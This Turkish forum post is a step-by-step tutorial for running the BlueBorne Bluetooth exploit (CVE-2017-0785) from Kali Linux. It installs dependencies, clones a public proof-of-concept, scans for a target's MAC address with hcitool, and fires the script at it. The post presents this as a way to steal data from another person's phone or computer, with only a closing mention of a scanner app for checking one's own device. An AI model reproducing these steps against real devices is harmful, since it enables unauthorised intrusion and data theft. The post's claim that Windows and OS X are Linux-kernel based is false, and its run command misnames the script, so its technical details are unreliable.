Merhabalar, bu konumda Türkçe anlatım olarak hiçbir sitede bulunmayan Blueborne exploiti anlatacağım.
1-BlueBorne Exploit Ne İşe Yarar? Neleri Etkiler?
2-BlueBorne Exploit İçin Gerekli Olan Paketleri Yükleme.
3-BlueBorne Exploit Yükleme.
4-Örnek BlueBorne Exploit Saldırısı.
BlueBorne Exploit Ne İşe Yarar? Neleri Etkiler ?:
Bilgisayar korsanlarının Bluetooth bağlantısını kullanarak karşıdaki telefon veya bilgisayar üzerinden veri çalmasına olanak sağlar.Android ve Tizenin yanı sıra Windows ve OS X de dahil olmak üzere Linux-Kernel temelli işletim sistemlerini de etkileyebilmektedir.
BlueBorne Exploit İçin Gerekli Paketleri Yükleme
Gerekli paketleri yüklemek için kali linux terminali açıyoruz ve terminalden paketlerimizi yüklüyoruz.
1- Libbluetooth-dev
Kod:
sudo apt-get install bluetooth libbluetooth-dev
Terminale yukarıdaki komutu yazıp enter tuşuna basıyoruz ve gelen soruya Y diyoruz.İlk paketimiz yüklenmiş oldu.
2- Pybluez
Kod:
sudo pip install pybluez
Terminale yukarıdaki komutu yazıp enter tuşuna basıyoruz ve paketimiz yükleniyor.
3-Pwntools
Kod:
sudo pip install pwntools
Terminale yukarıdaki komutu yazıp enter tuşuna basıyoruz ve son paketimizide yüklemiş oluyoruz.
BlueBorne Exploit Yükleme
Kali Linux terminali açıyoruz.
Kod:
git clone GitHub - ojasookert/CVE-2017-0785: Blueborne CVE-2017-0785 Android information leak vulnerability
Terminale yukarıdaki komutu yazıp BlueBorne Android Exploitimizi indiriyoruz.
Şimdi ise exploitimize yürütme izni vermemiz gerekiyor.Yürütme iznini nasıl verdiğimizi resimde anlattım.
BlueBorne Exploit Saldırısı
1-Hedef MAC Adresine Ulaşma
Kod:
hcitool scan
Mac adresine ulaşmak için hcitool kullanılabilir bunun için yukarıdaki komutu kullanabiliriz.
2-BlueBorne Exploiti Çalıştırma
Kod:
python CVE-2017-785.py TARGET= "MACADRESİ"
Exploiti çalıştırmak için yukarıdaki komutu kullanacağız.
Farklı işlemler yapmak için
Kod:
help
yukarıdaki help komutunu kullanabiliriz.
Konumuz buraya kadar.Anlatım tamamen bana aittir.Çok önemli olmasına rağmen bu exploit hakkında hiçbir sitede türkçe kaynak bulunmamaktadır/bulamadım.Umarım anlaşılır bir şekilde anlatabilmişimdir.Sağlıcakla kalın.
Telefondan Düzenleme: Telefonunuzda blueborne açığının olup olmadığını öğrenmek için Google Play'den blueborne scanner programını indirip telefonunuzu tarayıp öğrenebilirsiniz.
Moderatör tarafında düzenlendi: